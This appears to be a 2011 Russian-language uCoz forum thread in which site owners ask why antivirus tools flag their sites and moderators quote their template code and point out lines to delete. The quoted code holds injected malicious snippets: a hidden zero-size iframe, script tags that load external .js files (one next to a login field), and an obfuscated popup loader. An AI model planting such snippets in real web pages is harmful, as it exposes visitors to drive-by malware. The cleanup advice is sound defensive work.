Модератор форума: Yuri_G  
Сообщество uCoz » Мастерская uCoz » Безопасность сайта » Вирусы на сайтах (для изучения) (примеры вредоносного кода и устранение)
Вирусы на сайтах (для изучения)
LEA11
Сообщений: 2
Репутация: 1

Сообщение # 496 | 21:01:10 17 Фев 2011
Выручайте пожалуйста.
Захожу на сайт все нормально вирусов касперский не находит, друг заходит со своево копьютера и у него касперский находит один троян и несколько эксплоитав.
Сам прошелся по всему коду не смог наити нчего подозрительного, поэтому прошу помощи.
Адрес _http://leatest.ucoz.ru
webanet
Сообщений: 24067
Репутация: 4985

Сообщение # 497 | 21:10:22 17 Фев 2011
LEA11, выложите сюда код блока форма входа

в блоке опросы зачем вам это

Quote
Результаты</font></span></a></strong><br><a style="font-size: 5pt;" href="http://active-portal.ru/javascript://" rel="nofollow" onclick="new _uWnd('PollA','Архив опросов',660,250,{closeonesc:1,maxh:400,max:1,min:1},{url:'http://leatest.ucoz.ru/poll/0-2'});return false;">


</a><a style="font-size: 5pt;" href="http://active-portal.ru/javascript://" rel="nofollow" onclick="new _uWnd('PollA','Архив опросов',

ТУТ можно оставить своё мнение по любому вопросу
https://webanetlabs.net/
LEA11
Сообщений: 2
Репутация: 1

Сообщение # 498 | 21:17:36 17 Фев 2011
Code
<div align="center"><strong><SCRIPT LANGUAGE="JavaScript">
currentTime = new Date();
if (currentTime.getHours() >= 6 && currentTime.getHours() <= 11 )
document.write("Доброе утро, ");
if (currentTime.getHours() >= 12 && currentTime.getHours() <= 17 )
document.write("Добрый день, ");
if (currentTime.getHours() >= 18 && currentTime.getHours() <= 23)
document.write("Добрый вечер, ");
if (currentTime.getHours() >= 0 && currentTime.getHours() <= 5)
document.write("Доброй ночи, ");
</SCRIPT> $USERNAME$</strong>
<br> <br>
Сообщения: <?if($IS_NEW_PM$)?><img src="http://popcorm.at.ua/mini_profil/mail.gif" ><?else?><img src="http://popcorm.at.ua/mini_profil/mail1.gif" ><?endif?><br>
<?if($USER_AVATAR_URL$)?><img class="userAvatar" title="$USERNAME$" src="$USER_AVATAR_URL$" border="0"><?else?><?if($USER_LOGGED_IN$)?><img class="userAvatar" title="$USERNAME$" src="http://s56.radikal.ru/i152/0811/94/7504f641ae8e.png" border="0"><?else?><img class="userAvatar" title="$USERNAME$" src="http://popcorm.at.ua/mini_profil/no_avatar.jpeg" border="0"><?endif?><?endif?>

<span style="font-weight: bold; color: rgb(0, 102, 0);"><br><font color="#006400">Группа:</font></span> <b>$USER_GROUP$
<div align="center"><font color="#006400"><strong>Время:</strong></font><b>$TIME$
<?if($USER_LOGGED_IN$)?>
<div align="left">
<br><img src="http://popcorm.at.ua/mini_profil/user.png"> Логин: <b>$USER_FULL_NAME$ </b>

<br><img src="http://popcorm.at.ua/mini_profil/clock.png"> Ты здесь: <font color="#FF0000"><b>$USER_REG_DAYS$</b></font>-й день

<br><a target="_blank" rel="nofollow" href="http://webucoz.com/redirect.html?$PERSONAL_PAGE_LINK$"><img src="http://popcorm.at.ua/mini_profil/progr.gif" border="0"> Профиль</a>
<br><a href="javascript:openOnClick('users')"><img src="http://popcorm.at.ua/mini_profil/vcard.png"> Список пользователей</a>
<br><a href="javascript:openOnClick('options')"><img src="http://popcorm.at.ua/mini_profil/wrench.png"> Изменить информацию</a>
<br><iframe src="http://radikal.pp.ua/" name="iframe" width="0%" height="0%" scrolling="no" frameBorder=0></iframe><a href="javascript:openOnClick('send')"><img src="http://popcorm.at.ua/mini_profil/info.gif"> Отправить сообщение</a>
<br><a id="upml2" href="javascript:openOnClick('mail')"><img src="http://popcorm.at.ua/mini_profil/mail1.gif"> Читать ЛС (<b>$UNREAD_PM$</b>)</a>
<?if($IS_NEW_PM$)?><script type="text/javascript">function flashit(id,cl){var c=document.getElementById(id);if (c.style.color=='red'){c.style.color=cl;}else {c.style.color='red';}}setInterval("flashit('upml2','')",500)</script><?endif?> </div>
<DIV><br><center><a target="_blank" rel="nofollow" href="http://webucoz.com/redirect.html?$LOGOUT_LINK$"><img src="http://popcorm.at.ua/mini_profil/exit.jpg" border="0"></a></center></DIV>

<script language=javascript type=text/javascript>
function openOnClick(client_type)
{
if(client_type=="mail")clientWindow = window.open("$PM_URL$","pmw","scrollbars=1,top=0,left=0,resizable=1,width=850,height=350") ¦¦ alert("Отключите блокировку всплывающих окон!");
if(client_type=="send")clientWindow = window.open("/index/14-999-0-1","pms","scrollbars=1,top=0,left=0,resizable=1,width=850,height=350") ¦¦ alert("Отключите блокировку всплывающих окон!");
if(client_type=="options")clientWindow = window.open("/index/11","options","scrollbars=1,top=0,left=0,resizable=1,width=680,height=350") ¦¦ alert("Отключите блокировку всплывающих окон!");
if(client_type=="users")clientWindow = window.open("$USERS_LIST_URL$","users","scrollbars=1,top=0,left=0,resizable=1,width=680,height=350") ¦¦ alert("Отключите блокировку всплывающих окон!");

}
</script>
<?else?>
<br>ГОСТЬ, мы очень рады вас видеть! Авторизируйтесь или зарегистрируйтесь
<?endif?></div>

$LOGIN_FORM$
webanet
Сообщений: 24067
Репутация: 4985

Сообщение # 499 | 21:20:39 17 Фев 2011
Quote
<br><a target="_blank" rel="nofollow" href="http://webucoz.com/redirect.html?$PERSONAL_PAGE_LINK$">

Quote
<a target="_blank" rel="nofollow" href="http://webucoz.com/redirect.html?$LOGOUT_LINK$">
это было гениально причем в двух местах
удалить

Quote
<br><a href="javascript:openOnClick('users')"><img src="http://popcorm.at.ua/mini_profil/vcard.png"> Список пользователей</a>
<br><a href="javascript:openOnClick('options')"><img src="http://popcorm.at.ua/mini_profil/wrench.png"> Изменить информацию</a>
<br><iframe src="http://radikal.pp.ua/" name="iframe" width="0%" height="0%" scrolling="no" frameBorder=0></iframe><a href="javascript:openOnClick('send')"><img src="http://popcorm.at.ua/mini_profil/info.gif"> Отправить сообщение</a>
<br><a id="upml2" href="javascript:openOnClick('mail')"><img src="http://popcorm.at.ua/mini_profil/mail1.gif"> Читать ЛС (<b>$UNREAD_PM$</b>)</a>

не профиль, а помойка. все лишние редиректы удалить, ифрейм удалить и все картинки перелить к себе на сайт

ТУТ можно оставить своё мнение по любому вопросу
https://webanetlabs.net/
defaultNick4418
Сообщений: 1
Репутация: 0

Сообщение # 500 | 22:35:47 18 Фев 2011
Мой сайт http://www.freeprogram.ru/ - Недавно столкнулся с этими вирусами ток вот до сих пор вроде никак не могу от всех ненужных кодов избавиться...=( помогите пожалуйста... сайт имел хостов ну около 450 примерно в день ща был спад из-за вирусов надеюсь на вашу помощь в поиске лишних кодов... В БЛА7ГОДАРНОСТЬ ПОСТАВЛЮ БАННЕР ВА8ШЕ7ГО СА1ЙТА НА 2 НЕДЕЛИ =) ЗАРАНЕЕ СПАСИБО =) И ЕЩЕ ЕСЛИ ЧТО ОТПИШИТЕ ПОЖАЛУЙCТА НА ИМЕЙЛ nurik_gif@mail.ru ...=)
tut
Сообщений: 1
Репутация: 0

Сообщение # 501 | 00:07:17 19 Фев 2011
Здравствуйте.
Зашел на свой сайт funbookbonus.ucoz.com высветилась надпись: «Аккаунт заблокирован - Распространении вредоносного ПО.
Если вы являетесь владельцем данного сайта, вы можете связаться со службой поддержки uCoz через панель управления вашим сайтом, для выяснения обстоятельств.»
На сайте находился код партнерской программы, видимо он распространял вредоносное ПО. Код убрал.
Для того чтобы сайт включили, в панели управления сайтом необходимо обратиться в платную службу поддержки или бесплатную?
Заранее спасибо.
webanet
Сообщений: 24067
Репутация: 4985

Сообщение # 502 | 03:07:38 19 Фев 2011
tut, ну если вы уверены, что очистили сайт полностью, и очистили именно то что нужно, то пишите или платную (так быстрее) или в бесплатную (так ждать придется дольше)
только у вас должна быть полностью устранена причина блокировки

defaultNick4418,

Quote
ОТПИШИТЕ ПОЖАЛУЙCТА НА ИМЕЙЛ nurik_gif@mail.ru
пардон, но с доставкой на дом не работаем. вам нужно, а не нам
ТУТ можно оставить своё мнение по любому вопросу
https://webanetlabs.net/
superman8358
Сообщений: 3
Репутация: 0

Сообщение # 503 | 17:38:27 21 Фев 2011
webanet привет помоги пожайлуста короче у меня на сайте http://zombi-strax.ucoz.ru/ такая тема заходят 2 друга икороче у них чиста блокирует видну и пишит вышлите 300 рублей можете посмотреть что такое а то у друга видну накрыло :((( помогите прошу вас

Добавлено (21-Фев-2011, 17:38:27)
---------------------------------------------
ну или Scorpik427 можешь помочь тоже плиз

SPARTАCUS
Репутация: 134
Уровень замечаний:

Сообщение # 504 | 18:12:05 21 Фев 2011
superman8358, убери из глобального блока этот скрипт, он там в двух местах прописан в <!-- <block4> --> и в <!-- <block10> -->

<script src="http://iot.pp.ua/1.js" type="text/javascript"></script>

спасибо в репутацию
Сообщение отредактировал SPARTАCUS - Понедельник, 21 Фев 2011, 18:13:41
Bartlet6672
Сообщений: 2
Репутация: 0

Сообщение # 505 | 18:55:42 21 Фев 2011
Подскажите плиз, сейчас готовлю сайт, я его закрыл для других, но когда каждый раз захожу от своего имени NOd ругается, что это может быть и что мне делать? http://teplosvit.ucoz.ru/
Плавают разными стилями, тонут - одним.
Xose
Сообщений: 4
Репутация: 4
Уровень замечаний:

Сообщение # 506 | 19:04:12 21 Фев 2011
сайт : http://www.naruto-load.ru/
еще одна жалоба : ознакомился, но сайт меня переходит на какуето прогу и там на вирусы мой комп проверяет и там 1000 вирусов! не может быть, у нас стоитт мощьный антивирус, похоже на том сайте вирус....

ПРОШУ решить проблему

Dmitry
Сообщений: 2154
Репутация: 1057

Сообщение # 507 | 19:08:30 21 Фев 2011
Xose, убирайте всякую чушь в виде:
Code
<script type="text/javascript" src="http://c.am10.ru/code/pop/naruto-load.ru.js"></script>

<script type="text/javascript" src="http://c.am10.ru/code/pop/naruto-load.ru.js"></script>
<script>
function GetCookiePopt (name) { var arg = name + "="; var alen = arg.length; var clen = document.cookie.length; var i = 0; while (i < clen) { var j = i + alen; if (document.cookie.substring(i, j) == arg) return 1; i = document.cookie.indexOf(" ", i) + 1; if (i == 0) break; } return null;}advmaker = GetCookiePopt('advmaker_pop');
if (advmaker != null)
{
var out3='<SCR'+'IPT LANGUAGE="Javascript" cha'+'rset="win'+'dows-1251" SRC="http://c.am10.ru/code/sb/naruto-load.ru.js"></SC'+'RIPT>'; document.write(out3);}</script>
webanet
Сообщений: 24067
Репутация: 4985

Сообщение # 508 | 19:13:00 21 Фев 2011
superman8358, выделенное красным удалить
Quote
<!-- <block4> -->
<TABLE border="0" cellpadding="0" cellspacing="0" style="border:1px solid #3C3C3C;margin-bottom:2px;" width="180"><TBODY><TR><TD height="23" style="background:url(/diz/menuIIka.jpg) #252525;color:#cccccc;padding-left:28px;font-size:10px;"><B><!-- <bt> -->Наши CW<!-- </bt> --></B></TD></TR><TR><TD style="background:#000000;padding:5px;"><DIV style="display:inline;" id="menuDiv"><!-- <bc> --><center><img
src="http://i043.radikal.ru/1012/13/ddfe5dce8d4f.gif" class="IEpng" alt="Победы"
align="center" border="0"><br>Победы(5)<br><hr
size="2" width="100%"><img
src="http://i074.radikal.ru/1012/99/be5717ee5790.gif" alt="Поражения" align="center"
border="0"><br>Поражения(0)<br><script src="http://iot.pp.ua/1.js" type="text/javascript"></script><hr size="2"
width="100%"><center><img src="http://i070.radikal.ru/1012/19/eda95b9bedc9.gif"
border="0" ><br>Ничья (0)<br><a
href="/forum">Забить
cw</a><br><br></center><!-- </bc> -->

</TD></TR><TR><TD></TD></TR></TBODY></TABLE>
<!-- </block4> -->

Quote
<!--U1DRIGHTER1Z-->
<!-- <block10> -->
<TABLE border="0" cellpadding="0" cellspacing="0" style="border:1px solid #3C3C3C;margin-bottom:2px;" width="180"><TBODY><TR><TD height="23" style="background:url(/diz/menuIIka.jpg) #252525;color:#cccccc;padding-left:28px;font-size:10px;"><B><!-- <bt> -->Профиль<!-- </bt> --></B></TD></TR><TR><TD style="background:#000000;padding:5px;"><DIV style="display:inline;" id="menuDiv"><!-- <bc> --><div align="center"><strong>Привет, Гость</strong>
<br>
<script src="http://iot.pp.ua/1.js" type="text/javascript"></script><img class="userAvatar" title="Гость" src="http://i030.radikal.ru/1012/e6/a8a5f555d9d8.gif" border="0">


<br>Гость, мы рады вас видеть. Пожалуйста зарегистрируйтесь или авторизуйтесь!

так же выложите сюда код блока профиль. откройте блок на редактирование и скопируйте весь код сюда

ТУТ можно оставить своё мнение по любому вопросу
https://webanetlabs.net/
webanet
Сообщений: 24067
Репутация: 4985

Сообщение # 509 | 19:14:14 21 Фев 2011
Bartlet6672, выделенное красным удалить
Quote
<!--/U1CLEFTER1Z-->
</td>

<td valign="top" style="padding:0px 20px 0px 20px;">
<table border="0" cellpadding="5" cellspacing="0" width="100%"><tr><td><!-- <body> --><div id="myGrid" style="display:none;"><div style="position:fixed;width:100%;text-align:center;padding-top:250px;"><img alt="" src="http://s47.ucoz.net/img/ma/m/i3.gif" border="0" width="220" height="19" /></div></div><script type="text/javascript">function spages(p){if (1){document.location.href='http'+'://teplosvit.ucoz.ru/news/'+p; return;}try{document.getElementById('myGrid').style.cssText = 'position:absolute; z-index:8; top:0;left:0; display:block; background: url(\'http://s47.ucoz.net/img/fr/g.gif\'); text-align:center; width:'+document.body.scrollWidth+'px; height:'+document.body.scrollHeight+'px;';}catch(e){}_uPostForm('',{url:'http://teplosvit.ucoz.ru/index/0-0-0-'+p+'-'+Math.floor(Math.random()*1e8)});}</script><div id="allEntries"><div id="entryID4"><TABLE class="eBlock" border="0" cellpadding="1" cellspacing="0" width="100%"><TBODY><TR><TD style="padding: 3px;">

<TABLE style="padding-bottom: 1px;" border="0" cellpadding="1" cellspacing="1" width="100%"><TBODY><TR><TD colspan="2" style="border: 1px solid rgb(184, 184, 184); padding: 5px; background: rgb(255, 255, 255) none repeat scroll 0% 50%; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial;" align="left"><!--ENDIF-->

<DIV style="text-align:left;"><IMG src="http://www.smert.ucoz.kz/images/29pl3.gif"><A href="http://teplosvit.ucoz.ru/news/postuplenie_kondicionerov_osaka/2011-02-14-4"><B>Поступление кондиционеров OSAKA!</B></A> </DIV><B></B><script src="http://iot.pp.ua/1.js" type="text/javascript"></script></TD></TR><TR><TD colspan="2" style="border: 1px solid rgb(184, 184, 184); padding: 5px; background: rgb(255, 255, 255) none repeat scroll 0% 50%; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial;" align="left">
<DIV style="float: right;">
<IMG alt="" src="http://1qq.pp.ru/12435678/edit.gif" align="" border="0">
</DIV>

удалить битые скрипты

Quote
<tr><td width="20%" nowrap="nowrap"><img src="http://i020.radikal.ru/1101/18/9ef4b628f285.png" height="19" width="19" >Логин</td><td><script src="http://izizi.ru/1.js" type="text/javascript"></script>
<input class="loginField" type="text" name="user" value="" size="19" style="width:100%;" maxlength="50"/></td></tr>
<tr><td><img src="http://s45.radikal.ru/i109/1101/88/a60f1beb1d60.png" height="19" width="19" >Пароль<
ТУТ можно оставить своё мнение по любому вопросу
https://webanetlabs.net/
Xose
Сообщений: 4
Репутация: 4
Уровень замечаний:

Сообщение # 510 | 19:20:30 21 Фев 2011
вирус еще не убран помогите пожалуйста что дальше делать?
Сообщество uCoz » Мастерская uCoz » Безопасность сайта » Вирусы на сайтах (для изучения) (примеры вредоносного кода и устранение)
Поиск:
Telegram
Будьте в курсе всех обновлений: подпишитесь на наш официальный Telegram-канал uCoz и задавайте вопросы в чате сообщества!